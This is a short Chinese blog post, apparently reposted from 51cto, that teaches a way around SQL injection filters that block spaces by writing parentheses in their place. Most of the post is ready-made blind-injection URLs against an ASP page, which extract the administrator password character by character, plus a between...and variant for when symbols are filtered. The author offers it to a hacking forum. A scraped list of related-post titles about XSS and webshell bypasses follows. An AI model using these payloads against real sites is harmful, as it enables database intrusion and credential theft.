关于空格,有许多替换方式,比如TAB空格,SQL数据库中的/**/,但我又找到了另一种替换方式,已发表于《***手册》2006.7期中,这里挑其精华,现一下吧!

对于SQL语句,大家还都习惯于其的空格,比如select id from [name],如果中间没有了空格,那就成了selectidfrom[name], 一滩糊涂!除了上面所说到几个空格的替代方法外,我发现用()括号在SQL中一样可以运行,比如上面的语句,就可以写成,select(id)from[name],有括号分隔,可以正常执行。
     举个例 子说一下,我们得到一个注入点:jmdcw.asp?name=aa'and 1=1 and ''=',如果替换其中的1=1为查询管理员的密码的语句:(select asc(mid(pass,1,1)) from [name] where id=1)>49。如何用空格呢?其实可以写成这样的:
jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))>49)and''='
如果屏蔽了符号,则用between…and…,语句是:
jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))between(40)and(50))and''='

对于中间应该出现空格的地方,用()进行替换,不过,对于很复杂的SQL语句就不太好用了。上面说到的是字符型的,如果是数值型,可以在id=1后加一个括号,不过这个我没有测试,比如:jmdcw.asp?id=(1)and(select.....),应该是可行的吧?

呵呵,总结一下,和LOVESHELL上的朋友分享一下。

转载于:https://blog.51cto.com/liuq5212/41403

******:突破空格的限制相关推荐

  1. php写邮件空格_PHP 邮件漏洞小结

    前言 此篇文件为有关PHP邮件漏洞的总结,如有错误,还请各位师傅指出. PHP mail()函数介绍 PHP mail()函数利用姿势 PHP中,mail的函数在底层是写好的,调用linux的send ...

  2. xss攻击突破转义_WEB安全之XSS攻击方式与防御方式

    上一期给大家简单介绍XSS以及其操作,本期将带大家了解XSS比较常见的攻击方式与防御方式,一起去了解一下~ XSS 常见攻击方法 1.绕过 XSS-Filter,利用 <> 标签注入 Ht ...

  3. 如何在命令长度受限的情况下成功get到webshell(函数参数受限突破、mysql的骚操作)...

    0x01 问题提出 还记得上篇文章记一次拿webshell踩过的坑(如何用PHP编写一个不包含数字和字母的后门),我们讲到了一些PHP的一些如何巧妙地绕过数字和字母受限的技巧,今天我要给大家分享的是如 ...

  4. for循环语句例题及解析python_Python入门第8课,for语句综合练习,突破循环累加难点...

    6月2日大陈上了Python入门第7课,从学生上交的练习题来看,第2题和第5题错误最多. 第2题:阅读程序写结果 for i in range(6): print("*") 有一部 ...

  5. asp 检查黑名单_黑名单验证的突破

    黑名单验证的突破 操作系统特性 windows下对大小写不敏感,php和Php对windows来说都是一样的. windows下,上传的文件名中带有test.php::$DATA会在服务器生产一个te ...

  6. sql2005性能优化(在32位系统上突破2G内存使用量的方法)

    服务器磁盘为(SAS)IBM组成RAID0+1,SQL2K5只识别4G内存,实际只占用2G内存.而使用 AWE的话,应用程序可以直接将操作系统允许的最大物理内存量保留为未分页的内存.使用 AWE 使  ...

  7. 阿里云大咖秀——了不起的“空格”

    在这个脑洞大开的APP上面,你可以出售任何你想出售的"商品",包括你的时间.你的技能,你可以陪人聊天.代人跑腿,甚至只是笑给你听.这款特别的APP上线仅仅60天就获得了1个亿的A轮 ...

  8. Ubuntu20.04安装NVIDIA显卡驱动、CUDA、CUDNN及突破NVENC并发限制

    1.查看当前系统版本 cat /proc/version 显示为: 2.查看当前显卡型号: sudo lshw -numeric  -C display 显示我的显卡型号为:GM107M[GeForc ...

  9. 【C语言】BC102 带空格直角三角形图案(DAY 9)

    文章目录 原题题目 代码实现 重点突破 同类题通解 原题题目 题目传送门 代码实现 #include<stdio.h> int main() {int n=0;while (scanf(& ...

最新文章

  1. [翻译]Joomla 1.5架构(十一) model 包
  2. CALL TRANSACTION
  3. js 格式化 java时间格式化_javascript时间格式化
  4. 新手玩家一定要学会配枪,使命召唤手游,对枪械是非常专业的
  5. 72、android状态栏一体化,状态栏改变颜色
  6. 史上最冤!美国原子弹之父被骂了9年!最后他上台领奖,竟一把推开了总统.........
  7. 前端开发知识点解答-HTML-面试
  8. 字段连接select语句
  9. APP移动购物界面设计灵感
  10. 洛谷——P1897 电梯里的爱情(两种解法:普通方法、桶排序方法)
  11. 颓废了1年+,今天开始勤(tui)奋(fei)啦
  12. 圆桌讨论:计算机视觉如何渗透你我的生活?|CCF-GAIR 2017
  13. 中介管理系统php源代码,PHP房产中介管理系统小程序源码8.0.5 后台+前端
  14. 游戏测试永乐大典——服务端架构,游戏服务器架构,游戏数据库设计
  15. Win10下安装Ubuntu20.04双系统,看这一篇就够了
  16. doodoo.js发布1.1.0 -- 中文最佳实践Node.js Web快速开发框架,支持Koa.js, Express.js中间件。包含多项功能改进,及Bug修复。...
  17. 原创超简单代码(1.20)
  18. 哈工大计算机网络MOOC作业题解答
  19. IIS站点配置和DW CS6连接Access数据库
  20. cesium学习 之 Entity 画卫星轨道 (一)

热门文章

  1. iphone输入法换行_【每日一技】iPhone输入法不能换行的痛点,用这招0.5秒解决
  2. jar 工程我怎么在网页上url访问某一个方法_Java高级编程之URL处理
  3. 计算机窗口移动方法有,北京版一年级信息技术上册《操作窗口学本领》教案
  4. solr php大小写,Solr 学习(6) —- Solr的PHP客户端
  5. 报错, Exception: Missing URI template variable ‘id‘ for method parameter of type Long
  6. 2017.10.11 Problem c 失败总结
  7. 【英语学习】【WOTD】farouche 释义/词源/示例
  8. Intel Sandy Bridge/Ivy Bridge架构/微架构/流水线 (13) - 缓存层级结构
  9. Pentium II Pentium III架构/微架构/流水线 (2) - P6详解 - 前端(指令预取/译码/动态分支预测静态分支预测)
  10. python爬取去哪网数据_python最强的代理池,突破IP的封锁爬取海量数据(送项目源码)...